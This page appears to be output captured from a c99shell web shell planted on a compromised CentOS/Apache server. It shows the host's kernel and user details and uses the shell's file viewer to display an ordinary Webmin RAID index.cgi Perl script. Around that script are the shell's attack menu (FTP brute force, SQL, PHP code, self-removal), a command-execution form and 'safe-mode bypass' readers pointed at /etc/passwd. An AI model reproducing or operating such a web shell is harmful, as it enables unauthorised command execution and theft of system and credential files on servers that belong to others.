!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/raid/   drwxr-xr-x
Free 49.59 GB of 127.8 GB (38.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.cgi (3.19 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Display all RAID devices

require './raid-lib.pl';

# Check if raid is installed
if (!-r $config{'mdstat'}) {
    &error_exit(&text('index_emdstat', "<tt>$config{'mdstat'}</tt>"));
    }
if (&has_command("mdadm")) {
    # Using mdadm commands
    $raid_mode = "mdadm";
    $raid_ver = &get_mdadm_version();
    }
elsif (&has_command('mkraid') && &has_command('raidstart')) {
    # Using raid tools commands
    $raid_mode = "raidtools";
    }
else {
    &error_exit($text{'index_eprogs'});
    }
&open_tempfile(MODE, ">$module_config_directory/mode");
&print_tempfile(MODE, $raid_mode,"\n");
&close_tempfile(MODE);

&ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1, 0,
    &help_search_link("raid", "man", "doc"),
    undef, undef, &text('index_'.$raid_mode, $raid_ver));

# Display configured raid devices
$conf = &get_raidtab();
if (@$conf) {
    print &ui_columns_start([ $text{'index_name'},
                $text{'index_active'},
                $text{'index_level'},
                $text{'index_size'},
                $text{'index_members'} ]);
    foreach $c (@$conf) {
        $lvl = &find_value('raid-level', $c->{'members'});
        @mems = ( );
        foreach $d (&find('device', $c->{'members'})) {
            if (&find('raid-disk', $d->{'members'}) ||
                &find('parity-disk', $d->{'members'})) {
                push(@mems, $d->{'value'});
                }
            }
        print &ui_columns_row([
            "<a href='view_raid.cgi?idx=$c->{'index'}'>".
            &html_escape($c->{'value'})."</a>",
            $c->{'active'} ?
                "<font color=#00aa00>$text{'yes'}</font>" :
                "<font color=#ff0000>$text{'no'}</font>",
            $lvl eq 'linear' ? $text{'linear'} : $text{'raid'.$lvl},
            $c->{'size'} ? &nice_size($c->{'size'}*1024) : "",
            &ui_links_row(\@mems),
            ]);
        }
    print &ui_columns_end();
    }
else {
    print "<p><b>$text{'index_none'}</b><p>\n";
    }
&show_button();

# Form for mdadm monitoring options
if ($raid_mode eq "mdadm") {
    $notif = &get_mdadm_notifications();
    print &ui_hr();
    print &ui_form_start("save_mdadm.cgi", "post");
    print &ui_table_start($text{'index_header'}, undef, 2, [ "width=30%" ]);

    # Is monitoring enabled?
    if (&get_mdadm_action()) {
        print &ui_table_row($text{'index_monitor'},
           &ui_yesno_radio("monitor", &get_mdadm_monitoring() ? 1 : 0));
        }

    # Notification address
    print &ui_table_row($text{'index_mailaddr'},
        &ui_opt_textbox("mailaddr", $notif->{'MAILADDR'}, 40,
                $text{'index_mailaddrnone'}));

    # Notification sender
    print &ui_table_row($text{'index_mailfrom'},
        &ui_opt_textbox("mailfrom", $notif->{'MAILFROM'}, 40,
                $text{'index_mailfromnone'}));

    # Program to call for problems
    print &ui_table_row($text{'index_program'},
        &ui_opt_textbox("program", $notif->{'PROGRAM'}, 40,
                $text{'index_programnone'}));

    print &ui_table_end();
    print &ui_form_end([ [ undef, $text{'save'} ] ]);
    }

&ui_print_footer("/", $text{'index'});

sub show_button
{
print &ui_form_start("raid_form.cgi");
print &ui_submit($text{'index_add'});
local @levels = &get_raid_levels();
print &ui_select("level", "linear",
         [ [ "linear", $text{'linear'} ],
           map { [ $_, $text{'raid'.$_} ] } @levels ]),"\n";
print &ui_form_end();
}

sub error_exit
{
&ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1, 0,
    &help_search_link("raid", "man", "doc"));
print "<p><b>",@_,"</b><p>\n";
&ui_print_footer("/", $text{'index'});
exit;
}


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0133 ]--